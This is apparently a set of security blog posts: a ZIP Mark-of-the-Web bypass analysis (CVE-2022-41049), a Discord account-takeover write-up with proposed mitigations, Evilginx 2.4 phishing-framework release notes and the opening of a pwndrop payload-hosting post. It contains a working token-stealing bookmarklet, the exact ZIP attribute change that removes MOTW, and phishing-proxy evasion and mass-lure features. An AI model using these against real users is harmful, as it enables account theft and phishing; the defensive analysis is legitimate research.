PathCombineW turned out to be a wrapper around PathCchCombineExW function with output buffer size limit set to fixed value of 260 bytes. I thought that if I managed to create a really long filename or use some special characters, which would be ignored by the function handling the file extraction, but would trigger the length check in CheckUnZippedFile to fail, it could work.

I opened 010 Editor, which I highly recommend for any kind of hex editing work, and opened my sample ZIP file with a built-in ZIP template.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I spent few hours testing with different filename lengths, with different special characters, just to see if the extraction function would behave in erratic way. Unfortunately I found out that there was another path length check, called prior to the one I've been investigating. It triggered much earlier and prevented me from exploiting this one specific check. I had to start over and consider this path a dead end.

I looked if there are any controllable branching conditions, that would result in not triggering the call to CheckUnZippedFile at all, but none of them seemed to be dependent on any of the internal ZIP file parameters. I considered looking deeper into CheckUnZippedFile function and found out that when PathCombineW call succeeds, it creates a CAttachmentServices COM objects, which has its three methods called:

CAttachmentServices::SetReferrer(unsigned short const * __ptr64)
CAttachmentServices::SetSource(unsigned short const * __ptr64)
CAttachmentServices::SaveWithUI(struct HWND__ * __ptr64)

I realized I am about to go deep down a rabbit hole and I may spend there much longer than a hobby project like that should require. I had to get a public exploit sample to speed things up.

Huge thanks you @bohops & @bufalloveflow for all the help in getting the sample!

Detonating the live sample

I managed to copy over all relevant ZIP file parameters from the obtained exploit sample into my test sample and I confirmed that MOTW was gone, when I extracted the sample JScript file.

I decided to dig deeper into SaveWithUI COM method to find the exact place where creation of Zone.Identifier ADS fails. Navigating through shdocvw.dll, I ended up in urlmon.dll with a failing call to WritePrivateProfileStringW.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

This is the Windows API function for handling the creation of INI configuration files. Considering that Zone.Identifier ADS file is an INI file containing section ZoneTransfer, it was definitely relevant. I dug deeper.

The search led me to the final call of NtCreateFile, trying to create the Zone.Identifier ADS file, which failed with ACCESS_DENIED error, when using the exploit sample and succeeded when using the original, untampered test sample.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

It looked like the majority of parameters were constant, as you can see on the screenshot above. The only place where I'd expect anything dynamic was in the structure of ObjectAttributes parameter. After closer inspection and half an hour of closely comparing the contents of the parameter structures from two calls, I concluded that both failing and succeeding calls use exactly the same parameters.

This led me to realize that something had to be happening prior to the creation of the ADS file, which I did not account for. There was no better way to figure that out than to use Process Monitor, which honestly I should've used long before I even opened IDA 😛.

Backtracking

I set up my filters to only list file operations related to files extracted to TEMP directory, starting with Temp prefix.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

The test sample clearly succeeded in creating the Zone.Identifier ADS file:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

While the exploit sample failed:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Through comparison of these two listings, I could not clearly see any drastic differences. I exported the results as text files and compared them in a text editor. That's when I could finally spot it.

Prior to creating Zone.Identifier ADS file, the call to SetBasicInformationFile was made with FileAttributes set to RN.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I looked up what was that R attribute, which apparently is not set for the file when extracting from the original test sample and then...

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
Facepalm

The R file attribute stands for read-only. The file stored in a ZIP file has the read-only attribute set, which is set also on the file extracted from the ZIP. Obviously when Windows tries to attach the Zone.Identifier ADS, to it, it fails, because the file has a read-only attribute and any write operation on it will fail with ACCESS_DENIED error.

It doesn't even seem to be a bug, since everything is working as expected 😛. The file attributes in a ZIP file are set in ExternalAttributes parameter of the ZIPDIRENTRY structure and its value corresponds to the ones, which carried over from MS-DOS times, as stated in ZIP file format documentation I found online.

   4.4.15 external file attributes: (4 bytes)

       The mapping of the external attributes is
       host-system dependent (see 'version made by').  For
       MS-DOS, the low order byte is the MS-DOS directory
       attribute byte.  If input came from standard input, this
       field is set to zero.

   4.4.2 version made by (2 bytes)

        4.4.2.1 The upper byte indicates the compatibility of the file
        attribute information.  If the external file attributes 
        are compatible with MS-DOS and can be read by PKZIP for 
        DOS version 2.04g then this value will be zero.  If these 
        attributes are not compatible, then this value will 
        identify the host system on which the attributes are 
        compatible.  Software can use this information to determine
        the line record format for text files etc.  

        4.4.2.2 The current mappings are:

         0 - MS-DOS and OS/2 (FAT / VFAT / FAT32 file systems)
         1 - Amiga                     2 - OpenVMS
         3 - UNIX                      4 - VM/CMS
         5 - Atari ST                  6 - OS/2 H.P.F.S.
         7 - Macintosh                 8 - Z-System
         9 - CP/M                     10 - Windows NTFS
        11 - MVS (OS/390 - Z/OS)      12 - VSE
        13 - Acorn Risc               14 - VFAT
        15 - alternate MVS            16 - BeOS
        17 - Tandem                   18 - OS/400
        19 - OS X (Darwin)            20 thru 255 - unused

        4.4.2.3 The lower byte indicates the ZIP specification version 
        (the version of this document) supported by the software 
        used to encode the file.  The value/10 indicates the major 
        version number, and the value mod 10 is the minor version 
        number.  

Changing the value of external attributes to anything with the lowest bit set e.g. 0x21 or 0x01, would effectively make the file read-only with Windows being unable to create MOTW for it, after extraction.

Conclusion

I honestly expected the bug to be much more complicated and I definitely shot myself in the foot, getting too excited to start up IDA, instead of running Process Monitor first. I started with IDA first as I didn't have an exploit sample in the beginning and I was hoping to find the bug, through code analysis. Bottom line, I managed to learn something new about Windows internals and how extraction of ZIP files is handled.

As a bonus, Mitja Kolsek from 0patch asked me to confirm if their patch worked and I was happy to confirm that it did!

Nice work. Care to verify that our micropatches fix this? (A free 0patch account suffices.) https://t.co/us8FVWczXk

— Mitja Kolsek (@mkolsek) November 1, 2022

The patch was clean and reliable as seen in the screenshot from a debugger:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I've been also able to have a nice chat with Will Dormann, who initially discovered this bug, and his story on how he found it is hilarious:

I merely wanted to demonstrate how an exploit in a ZIP was safer (by way of prompting the user) than that *same* exploit in an ISO.  So how did I make the ZIP?  I:
1) Dragged the files out of the mounted ISO
2) Zipped them. That's it.  The ZIP contents behaved the same as the ISO.

Every mounted ISO image is listing all files in read-only mode. Drag & dropping files from read-only partition, to a different one, preserves the read-only attribute set for created files. This is how Will managed to unknowingly trigger the bug.

Will also made me realize that 7zip extractor, even though having announced they began to add MOTW to every file extracted from MOTW marked archive, does not add MOTW by default and this feature has to be enabled manually.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I mentioned it as it may explain why MOTW is not always considered a valid security boundary. Vulnerabilities related to it may be given low priority and be even ignored by Microsoft for 90 days.

When 7zip announced support for MOTW in June, I honestly took for granted that it would be enabled by default, but apparently the developer doesn't know exactly what he is doing.

I haven't yet analyzed how the patch made by Microsoft works, but do let me know if you did and I will gladly update this post with additional information.

Hope you enjoyed the write-up!

Hacked Discord - Bookmarklet Strikes Back

Hacked Discord - Bookmarklet Strikes Back

For the past couple of months, I've been hearing about increasing numbers of account takeover attacks in the Discord community. Discord has somehow become a de facto official messenger application among the cryptocurrency community, with new channels oriented around NFTs, popping up like mushrooms.

Hacking Discord accounts has suddenly become a very lucrative business for cybercriminals, who are going in for the kill, to make some easy money. They take over admin accounts in cryptocurrency-oriented communities to spread malware and launch further social engineering attacks. My focus is going to be purely on Discord account security, which should be of concern to everyone using Discord.

In recent weeks I thought the attackers are using some new reverse-proxy phishing techniques to hijack WebSocket sessions with similar tools to Evilginx, but in reality the hacks, I discovered, are much easier to execute than I anticipated.

In this post I will be explaining how the attacks work, what everyone can do to protect themselves and more importantly what Discord can do to mitigate such attacks.

Please bear in mind that this post covers my personal point of view on how I feel the mitigations should be implemented and I am well aware that some of you may have much better ideas. I encourage you to contact me @mrgretzky or at [email protected] if you feel I missed anything or was mistaken.

Criticism is welcomed!

The Master Key

When you log in to your Discord account, either by entering your account credentials on the login screen, or by scanning a QR code with your Discord mobile app, Discord will send you your account token, in form of a string of data.

This token is the only key required to access your Discord account.

From now on I will refer to that token as the master token, since it works like a master key for your Discord account. That single line of text, consisting of around 70 characters, is what the attackers are after. When they manage to extract the master token from your account, it is game over and third parties can now freely access your account, bypassing both the login screen and any multi-factor authentication you may've set up.

Now that we know what the attackers are after, let's analyze the attack flow.

Deception Tactics

Attacker's main goal is to convince you in any way possible to reveal your account token, with the most likely approach being social engineering. First, attackers will create a story to set themselves up as a people you can trust, who will resolve your pressing issue, like unban your account on a Discord channel or elevate your community status.

There is a hack/scam(bypasses 2fa) that scammers are using to compromise discord accounts. If you are a project founder/admin, this is IMPORTANT.

Our server just got attacked.

Here's how, a🧵

— Little Lemon Friends (@LittlelemonsNFT) January 3, 2022

In this thread you can read how attackers managed to convince the target to do a screen share from their computer with Chrome DevTools opened, on the side. DevTools allowed them to extract the master token, through revealing the contents of Discord's LocalStorage.

Discord now purposefully renames the window.localStorage object, when it loads, to make it inaccessible to injected JavaScript. It also hides the token variable, containing the master token's value, from the storage. This was done to prevent attackers from stealing master tokens, by convincing the targets to open LocalStorage through screen share.

Discord also shows a pretty warning, informing users about the risks of pasting unknown code into the DevTools console.

Hacked Discord - Bookmarklet Strikes Back

The renaming of localStorage object and concealment of token variable did not fix the issue. Attackers figured out they can force Discord window to reload and then retrieve the data before implemented mitigations are executed.

This is exactly how the most recent bookmarklet attack works. Attackers convince their victim to bookmark JavaScript code in their bookmarks tab and trick them later to click the saved bookmark, with Discord app in focus, to execute attacker's malicious code.

Attacker's code retrieves the victim's Discord master token and sends it to the attacker.

Hacked Discord - Bookmarklet Strikes Back
Saved malicious bookmarklet would look like this.

The malicious JavaScript to access the master token looks like this:

javascript:(function(){location.reload();var i = document.createElement('iframe');document.body.appendChild(i);alert(i.contentWindow.localStorage.token)})()

To try it out, open Discord website, go to the console tab in Chrome DevTools (Control+Shift+I) and paste this code into it, which is something you should never do when asked 😉. After you press Enter, you should see the popup box with your master token value in it.

Attackers will exfiltrate the token through Discord WebHooks. This is done to bypass current Content Security Policy rules as obviously discord.com domain is allowed to be connected to from Discord client.

Most users have no idea that saved bookmarks can run malicious JavaScript in context of the website they are currently viewing. This is why this type of attack may be successful among even the security savvy users.

Another much harder approach, the attackers can take, is deploying malware onto target computer. Once you install malware on your PC the consequences can be far greater than just losing your Discord account. Just wanted to make note here that browser's LocalStorage will store the tokens in unencrypted form.

LocalStorage database files for Chrome reside in:

%LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Local Storage\leveldb\
Hacked Discord - Bookmarklet Strikes Back
Discord master token found inside one of the LocalStorage database files

Once the attacker retrieves your Discord master token, they can inject it into their browser's LocalStorage, with token as a variable name. It can easily be done using LocalStorage Manager extension for Chrome.

Discord on reload will detect the valid token in its LocalStorage and allow full control over the hijacked account. All this is possible even with multi-factor authentication enabled on hijacked account.

Proposed Mitigations

The fact that a single token, accessible through JavaScript, lets you impersonate and fully control another user's account is what makes the bookmarklet attack possible.

The attacker needs to execute their malicious JavaScript in context of the user's Discord session. This can happen either through exploitation of an XSS vulnerability or by tricking a user into bookmarking and clicking the JavaScript bookmarklet.

There is unfortunately no definitive fix to this problem, but there are definitely ways to increase the costs for attackers and make the attacks much harder to execute.

Store Token as an HttpOnly Cookie

Modern web services rely heavily on communication with REST APIs and Discord is no different. REST APIs, to conform with the standard, must implement a stateless architecture, meaning that each request from the client to the server must contain all of the information necessary to understand and complete the request.

The session token, included with requests to REST API, is usually embedded within the Authorization HTTP header. We can see that Discord app does it the same way:

Hacked Discord - Bookmarklet Strikes Back
Master token sent via Authorization HTTP header

For the web application to be able to include the session token within the Authorization header or request body, the token value itself must be accessible through JavaScript. Token accessible through JavaScript will be always vulnerable to XSS bugs or other JavaScript injection attacks (like bookmarklets).

Some people may not agree with me, but I think that critical authorization tokens should be handled through cookie storage, inaccessible to JavaScript. Support for Authorization header server-side can also be allowed, but it should be optional. For reasons unknown to me, majority of REST API developers ignore token authorization via cookies altogether.

Server should be sending the authorization session token value as a cookie with HttpOnly flag, in Set-Cookie HTTP header.

Storing the session token with HttpOnly flag, in the browser, will make sure that the cookie can never be retrieved from JavaScript code. The session token will be automatically sent with every HTTP request to domains, the cookie was set up for.

The request, which sends authentication token as a cookie, could look like this:

Hacked Discord - Bookmarklet Strikes Back
How Discord may be sending the session token via cookies, instead of Authorization header

I've noticed that Discord's functionality does not rely solely on interaction with its API, but the major part of its functionality is handled through WebSocket connections.

The WebSocket connection is established with gateway.discord.gg endpoint, instead of the main discord.com domain.

Hacked Discord - Bookmarklet Strikes Back
Discord initiating a WebSocket connection

If the session token cookie was delivered as a response to request delivered to domain discord.com, it would not be possible to set a cookie for domain discord.gg due to security boundaries.

To counter that, Discord would either need to implement some smart routing allowing Discord clients to use WebSocket connections through discord.com domain or it would have to implement authorization using one-time token with discord.gg endpoint, once the user successfully logs in, to have discord.gg  return a valid session token as a cookie, for its own domain.

Right now Discord permits establishing WebSocket connection through gateway.discord.gg to anyone and the authorization token validation happens during internal WebSocket messages exchange.

This means that the session token is also required during WebSocket communication, increasing its reliance on being accessible through JavaScript. This brings me to another mitigation that can be implemented.

Ephemeral Session Tokens

Making a strict requirement for tokens to be delivered as HttpOnly cookies, will never work. There needs to be some way to have authorization tokens accessible to JavaScript and not give the attacker all the keys to the castle once that token gets compromised.

That's why I'd make authentication reliant on two types of tokens:

  1. Authentication token stored only as a cookie with HttpOnly flag, which will be used to authenticate with REST API and to initiate a WebSocket connection.
  2. Session token generated dynamically with short expiration time (few hours), accompanied by a refresh token used for creating new session tokens. Session tokens will be used only in internal WebSocket communication. WebSocket connections will allow to be established only after presenting a valid authentication token as a cookie.

If you wish to learn more about ephemeral session tokens and refresh tokens, I recommend this post.

But, wait! Attacker controls the session anyway!

Before you yell at me about all of these mitigations being futile, because the attacker, with his injected JavaScript, is already able to fully impersonate and control the hacked user session, hear me out.

Me and @buherator exchanged opinions about possible mitigations and he made a good point:

I don't see how this would make a difference. The app needs to maintain long term sessions, thus the attacker in control of the app can have them too (if she can't achive her goal in millis). Having to request new tokens periodically is an implementation nuance.

— buherator (@buherator) August 27, 2022

In short - the attacker is able to inject their own JavaScript, which will work in context of the Discord app. Running malicious code in context of Discord allows the attacker to make any request to Discord API, with all required security tokens attached. This also includes cookies stored with HttpOnly flag, since attacker's requests can have them included automatically with withCredentials set to true:

var req = new XmlHttpRequest();
req.open("GET", “http://discord.com/api/v9/do_something”, true);
req.withCredentials = true;
req.send(null);
How attacker could be able to make HTTP requests to Discord API with valid authentication cookies.

No matter how well the tokens are protected, Discord client needs access to all of them, which means attacker executing code, in context of the app, will be able to forge valid client requests, potentially being able to change user's settings or sending spam messages to subscribed channels.

I've been thinking about it for few days and reached a conclusion that implementing the mitigations I mentioned would still be worth it. At the moment the attack is extremely easy to pull off, which is what makes it so dangerous. Ability to forge packets, impersonating a target user is not as bad as being able to completely recreate victim's session within a Discord client remotely.

With token cookie protected with HttpOnly flag, the attacker will only be able to use the token to perform actions, impersonating the hacked user, but they will never be able to exfiltrate the token's value, in order to inject it into their own browser.

In my opinion this will still vastly lower the severity of the attack and will force the attackers to increase the complexity of the attack in technical terms, requiring knowledge of Discord API, in order to perform the attacker's tasks, once the user's session is hijacked.

Another thing to note here is that the attacker will remain in charge of the user's hijacked session only until the Discord app is closed or reloaded. They will not be able to spawn their own session to freely impersonate the hacked user at any time they want. Currently the stolen master token gives the attacker lifetime access to victim's account. Token is invalidated and recreated only when user changes their password.

Takeaways

It is important to note that the attackers are only able to exfiltrate the master token value, using XMLHttpRequest and Discord's Webhooks, by sending it to Discord channels they control. Using WebHooks allows them to comply with Discord's Content Security Policy.

If it weren't for WebHooks, attackers would have to figure out another way to exfiltrate the stolen tokens. At the time of writing the article, the connect-src CSP rules for discord.com, which tell the browser the domains it should only allow Discord app to connect to, are as follows:

connect-src 'self' https://discordapp.com https://discord.com https://connect.facebook.net https://api.greenhouse.io https://api.github.com https://sentry.io https://www.google-analytics.com https://hackerone-api.discord.workers.dev https://*.hcaptcha.com https://hcaptcha.com https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location ws://127.0.0.1:* http://127.0.0.1:*;

There seem to be other services allowed, which could be used to exfiltrate the tokens through them, like GitHub API, Sentry or Google Analytics.

Not sure if Discord client needs access to WebHooks through XMLHttpRequest, but if it doesn't, it may've been a better choice for Discord to host WebHook handlers on a different domain than discord.com and control access to them with additional CSP rules.

There is also one question, which remains unanswered:

Should web browsers still support bookmarklets?

As asked by @zh4ck in his tweet, which triggered my initial curiosity about the attacks.

Bookmarklets were useful in the days when it was convenient to click them to spawn an HTML popup for quickly sharing the URL on social media. These days I'm not sure if anyone still needs them.

I have no idea if letting bookmarks start with javascript: is needed anymore, but it can easily become one of those legacy features that will keep coming back to haunt us.

Wrap-up

I hope you liked the post and hopefully it managed to teach you something.

I am constantly looking for interesting projects to work on. If you think my skills may be of help to you, do reach out, through the contact page.

Until next time!

References

Evilginx 2.4 - Gone Phishing

Evilginx 2.4 - Gone Phishing

Welcome back everyone! I can expect everyone being quite hungry for Evilginx updates! I am happy to announce that the tool is still kicking.

It's been a while since I've released the last update. This blog tells me that version 2.3 was released on January 18th 2019. One and a half year is enough to collect some dust.

I'll make sure the wait was worth it.

First of all, I wanted to thank all you for invaluable support over these past years. I've learned about many of you using Evilginx on assessments and how it is providing you with results. Such feedback always warms my heart and pushes me to expand the project. It was an amazing experience to learn how you are using the tool and what direction you would like the tool to expand in. There were some great ideas introduced in your feedback and partially this update was released to address them.

I'd like to give out some honorable mentions to people who provided some quality contributions and who made this update happen:

>> GET EVILGINX HERE <<


Special Thanks!

Julio @juliocesarfort - For constantly proving to me and himself that the tool works (sometimes even too well)!

OJ Reeves @TheColonial - For constant great source of Australian positive energy and feedback and also for being always humble and a wholesome and awesome guy! Check out OJ's live hacking streams on Twitch.tv and pray you're not matched against him in Rocket League!

pry @pry0cc - For pouring me many cups of great ideas, which resulted in great solutions! Also check out his great tool axiom!

Jason Lang @curiousjack - For being able to bend Evilginx to his will and in turn gave me ideas on what features are missing and needed.

@an0nud4y - For sending that PR with amazingly well done phishlets, which inspired me to get back to Evilginx development.

Pepe Berba - For his incredible research and development of custom version of LastPass harvester! I still need to implement this incredible idea in future updates.

Aidan Holland @thehappydinoa - For spending his free time creating these super helpful demo videos and helping keep things in order on Github.

Luke Turvey @TurvSec - For featuring Evilginx and for creating high quality tutorial hacking videos on his Youtube channel

So, again - thank you very much and I hope this tool will stay relevant to your work for the years to come and may it bring you lots of pwnage! Just remember to let me know on Twitter via DM that you are using it and about any ideas you're having on how to expand it further!

Here is the list of upcoming changes:

2.4.0

  • Feature: Create and set up pre-phish HTML templates for your campaigns. Create your HTML file and place {lure_url_html} or {lure_url_js} in code to manage redirection to the phishing page with any form of user interaction. Command: lures edit <id> template <template>
  • Feature: Create customized hostnames for every phishing lure. Command: lures edit <id> hostname <hostname>.
  • Feature: Support for routing connection via SOCKS5 and HTTP(S) proxies. Command: proxy.
  • Feature: IP blacklist with automated IP address blacklisting and blocking on all or unauthorized requests. Command: blacklist
  • Feature: Custom parameters can now be embedded encrypted in the phishing url. Command: lures get-url <id> param1=value1 param2="value2 with spaces".
  • Feature: Requests to phishing urls can now be rejected if User-Agent of the visitor doesn't match the whitelist regular expression filter for given lure. Command: lures edit <id> ua_filter <regexp>
  • List of custom parameters can now be imported directly from file (text, csv, json). Command: lures get-url <id> import <params_file>.
  • Generated phishing urls can now be exported to file (text, csv, json). Command: lures get-url <id> import <params_file> export <export_file> <text|csv|json>.
  • Fixed: Requesting LetsEncrypt certificates multiple times without restarting. Subsequent requests would result in "No embedded JWK in JWS header" error.
  • Removed setting custom parameters in lures options. Parameters will now only be sent encoded with the phishing url.
  • Added with_params option to sub_filter allowing to enable the sub_filter only when specific parameter was set with the phishing url.
  • Made command help screen easier to read.
  • Improved autofill for lures edit commands and switched positions of <id> and the variable name.
  • Increased the duration of whitelisting authorized connections for whole IP address from 15 seconds to 10 minutes.

I'll explain the most prominent new features coming in this update, starting with the most important feature of them all.

Pre-phish HTML Templates

First of all let's focus on what happens when Evilginx phishing link is clicked. It verifies that the URL path corresponds to a valid existing lure and immediately shows you proxied login page of the targeted website.

If that link is sent out into the internet, every web scanner can start analyzing it right away and eventually, if they do their job, they will identify and flag the phishing page.

Pre-phish HTML templates add another step in, before the redirection to phishing page takes place. You can create your own HTML page, which will show up before anything else. On this page, you can decide how the visitor will be redirected to the phishing page.

One idea would be to show up a "Loading" page with a spinner and have the page wait for 5 seconds before redirecting to the destination phishing page. Another one would be to combine it with some social engineering narration, showing the visitor a modal dialog of a file shared with them and the redirection would happen after visitor clicks the "Download" button.

Evilginx 2.4 - Gone Phishing
Pre-phish page requiring the visitor to click the download button before being redirected to the phishing page.

Every HTML template supports customizable variables, which values can be delivered embedded with the phishing link (more info on that below).

There are also two variables which Evilginx will fill out on its own. These are:

{lure_url}: This will be substituted with an unquoted URL of the phishing page. This one is to be used inside your HTML code. Example output: https://your.phish.domain/path/to/phish

{lure_url_js}: This will be substituted with obfuscated quoted URL of the phishing page. Obfuscation is randomized with every page load. This one is to be used inside of your Javascript code. Example output:

'h' + 't' + 'tp' + 's:/' + '/' + 'c' + 'hec' + 'k.' + 't' + 'his' + '.ou' + 't' + '.fa' + 'k' + 'e' + '.' + 'co' + 'm' + '/se' + 'cur' + 'it' + 'y/' + 'c' + 'hec' + 'k?' + 'C' + '=g' + '3' + 'Ct' + 'p' + 'sA'

The first variable can be used with <a href=...> HTML tags like so:

<a href="{lure_url}">Click here</a>

While the second one should be used with your Javascript code:

window.location.assign({lure_url_js});

If you want to use values coming from custom parameters, which will be delivered embedded with the phishing URL, put placeholders in your template with the parameter name surrounded by curly brackets: {parameter_name}

You can check out one of the sample HTML templates I released, here: download_example.html

Evilginx 2.4 - Gone Phishing
HTML source code of example template

Once you create your HTML template, you need to set it for any lure of your choosing. Remember to put your template file in /templates directory in the root Evilginx directory or somewhere else and run Evilginx by specifying the templates directory location with -t <templates_path> command line argument.

Set up templates for your lures using this command in Evilginx:

lures edit <id> templates <template_name>

Custom Parameters in Phishing Links

In previous versions of Evilginx, you could set up custom parameters for every created lure. This didn't work well at all as you could only provide custom parameters hardcoded for one specific lure, since the parameter values were stored in database assigned to lure ID and were not dynamically delivered.

This is changing with this version. Storing custom parameter values in lures has been removed and it's been replaced with attaching custom parameters during phishing link generation. This allows for dynamic customization of parameters depending on who will receive the generated phishing link.

In the example template, mentioned above, there are two custom parameter placeholders used. You can specify {from_name} and {filename} to display a message who shared a file and the name of the file itself, which will be visible on the download button.

To generate a phishing link using these custom parameters, you'd do the following:

lures get-url 0 from_name="Ronald Rump" filename="Annual Salary Report.xlsx"

Remember - quoting values is only required if you want to include spaces in parameter values. You can also escape quotes with \ e.g. variable1=with\"quote.

This will generate a link, which may look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?vLT=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT

As you can see both custom parameter values were embedded into a single GET parameter. The parameter name is randomly generated and its value consists of a random RC4 encryption key, checksum and a base64 encoded encrypted value of all embedded custom parameter. This ensures that the generated link is different every time, making it hard to write static detection signatures for. There is also a simple checksum mechanism implemented, which invalidates the delivered custom parameters if the link ever gets corrupted in transit.

Don't forget that custom parameters specified during phishing link generation will also apply to variable placeholders in your js_inject injected Javascript scripts in your phishlets.

It is important to note that you can change the name of the GET parameter, which holds the encrypted custom parameters. You can also add your own GET parameters to make the URL look how you want it. Evilginx is smart enough to go through all GET parameters and find the one which it can decrypt and load custom parameters from.

For example if you wanted to modify the URL generated above, it could look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?token=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT&region=en-US&date=20200907&something=totally_irrelevant_get_parameter

Generating phishing links one by one is all fun until you need 200 of them, with each requiring different sets of custom parameters. Thankfully this update also got you covered.

You can now import custom parameters from file in text, CSV and JSON format and also export the generated links to text, CSV or JSON. You can also just print them on the screen if you want.

Evilginx 2.4 - Gone Phishing
Importing custom parameters from file to generate three phishing links

Custom parameters to be imported in text format would look the same way as you would type in the parameters after lures get-url command in Evilginx interface:

[email protected] name="Katelyn Wells"
[email protected] name="George Doh" delay=5000
[email protected] name="John Cena"
params.txt

If you wanted to use CSV format:

email,name,delay
[email protected],"Katelyn Wells",
[email protected],"George Doh",5000
[email protected]il.com,"John Cena",
params.csv

And lastly JSON:

[
	{
		"email":"[email protected]",
		"name":"Katelyn Wells"
	},
	{
		"email":"[email protected]",
		"name":"George Doh",
		"delay":"5000"
	},
	{
		"email":"[email protected]",
		"name":"John Cena"
	}
]
params.json

For import files, make sure to suffix a filename with file extension according to the data format you've decided to use, so .txt for text format, .csv for CSV format and .json for JSON.

Generating phishing links by importing custom parameters from file can be done as easily as:

lures get-url <id> import <import_file>

Now if you also want to export the generated phishing links, you can do it with export parameter:

lures get-url <id> import <import_file> export <export_file> <text|csv|json>

Last command parameter selects the output file format.

Custom Hostnames for Phishing Links

Normally if you generated a phishing URL from a given lure, it would use a hostname which would be a combination of your phishlet hostname and a primary subdomain assigned to your phishlet. During assessments, most of the time hostname doesn't matter much, but sometimes you may want to give it a more personalized feel to it.

That's why I wanted to do something about it and make the phishing hostname, for any lure, fully customizable. Since Evilginx is running its own DNS, it can successfully respond to any DNS A request coming its way.

So now instead of being forced to use a phishing hostname of e.g. www.linkedin.phishing.com, you can change it to whatever you want like this.is.totally.not.phishing.com. Of course this is a bad example, but it shows that you can go totally wild with the hostname customization and you're no longer constrained by pre-defined phishlet hostnames. Just remember that every custom hostname must end with the domain you set in the config.

You can change lure's hostname with a following command:

lures edit <id> hostname <your_hostname>

After the change, you will notice that links generated with get-url will use the new hostname.

User-Agent Filtering

This is a feature some of you requested. It allows you to filter requests to your phishing link based on the originating User-Agent header. Just set an ua_filter option for any of your lures, as a whitelist regular expression, and only requests with matching User-Agent header will be authorized.

As an example, if you'd like only requests from iPhone or Android to go through, you'd set a filter like so:

lures edit <id> ua_filter ".*(Android|iPhone).*"

HTTP & SOCKS5 Proxy Support

You can finally route the connection between Evilginx and targeted website through an external proxy.

This may be useful if you want the connections to specific website originate from a specific IP range or specific geographical region. It may also prove useful if you want to debug your Evilginx connection and inspect packets using Burp proxy.

You can check all available commands on how to set up your proxy by typing in:

help proxy

Make sure to always restart Evilginx after you enable proxy mode, since it is the only surefire way to reset all already established connections.

IP Blacklist

If you don't want your Evilginx instance to be accessed from unwanted sources on the internet, you may want to add specific IPs or IP ranges to blacklist. You can always find the current blacklist file in:

~/.evilginx/blacklist.txt

By default automatic blacklist creation is disabled, but you can easily enable it using one of the following options:

blacklist unauth

This will automatically blacklist IPs of unauthorized requests. This includes all requests, which did not point to a valid URL specified by any of the created lures.

blacklist on

This will blacklist IP of EVERY incoming request, despite it being authorized or not, so use caution. This will effectively block access to any of your phishing links. You can use this option if you want to send out your phishing link and want to see if any online scanners pick it up.

If you want to add IP ranges manually to your blacklist file, you can do so by editing blacklist.txt file in any text editor and add the netmask to the IP:

134.123.0.0/16

You can also freely add comments prepending them with semicolon:

; this is a comment
18.123.445.0/24 ;another comment

New with_params Option for Phishlets

You can now make any of your phishlet's sub_filter entries optional and have them kick in only if a specific custom parameter is delivered with the phishing link.

You may for example want to remove or replace some HTML content only if a custom parameter target_name is supplied with the phishing link. This may allow you to add some unique behavior to proxied websites. All sub_filters with that option will be ignored if specified custom parameter is not found.

You can add it like this:

sub_filters:
- {triggers_on: 'auth.website.com', orig_sub: 'auth', domain: 'website.com', search: '<body\s', replace: '<body style="visibility: hidden;" ', mimes: ['text/html'], with_params: ['target_name']}

This will hide the page's body only if target_name is specified. Later the added style can be removed through injected Javascript in js_inject at any point.

Quality of Life Updates

I've also included some minor updates. There are some improvements to Evilginx UI making it a bit more visually appealing. Fixed some bugs I found on the way and did some refactoring. All the changes are listed in the CHANGELOG above.

Epilogue

I'm glad Evilginx has become a go-to offensive software for red teamers to simulate phishing attacks. It shows that it is not being just a proof-of-concept toy, but a full-fledged tool, which brings reliability and results during pentests.

I hope some of you will start using the new templates feature. I welcome all quality HTML templates contributions to Evilginx repository!

If you have any ideas/feedback regarding Evilginx or you just want to say "Hi" and tell me what you think about it, do not hesitate to send me a DM on Twitter.

Also please don't ask me about phishlets targeting XYZ website as I will not provide you with any or help you create them. Evilginx is a framework and I leave the creation of phishlets to you. There are already plenty of examples available, which you can use to learn how to create your own.

Happy phishing!

>> GET EVILGINX HERE <<


Find me on Twitter: @mrgretzky

Email: [email protected]

Pwndrop - Self-hosting Your Red Team Payloads

Pwndrop - Self-hosting Your Red Team Payloads

I have to admit, I took my sweet time to write this post and release this tool, but the time has finally come. I am finally ready to publish pwndrop, which has been in development for the last two years. Rewritten from scratch once (Angular.js was not a right choice) and stalled for multiple months due to busy times at work.

The timing for the release isn't ideal, but at least I hope using pwndrop can help you get through these tough weeks/months.

Also stay at home, don't eat bats and do not burn any 5G antennas.

If you want to jump straight in and grab the tool, follow this link to Github:

pwndrop - Github

What is pwndrop?

Pwndrop is a self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.

Pwndrop - Self-hosting Your Red Team Payloads

If you've ever wasted a whole evening setting up a web server just to host a few files and get that .htaccess file redirection working, fear no more. Your future evenings are safe from being wasted again!

With pwndrop you can set up your own on-premise file server. The features are specifically tailored for red teamers, willing to host their payloads, but the tool can also be used as a normal file sharing service. All uploaded files are accessible via HTTP, HTTPS and WebDAV.

Before jumping into describing what features are present on release, I wanted to give away some information on the tool's development process.

Under the hood

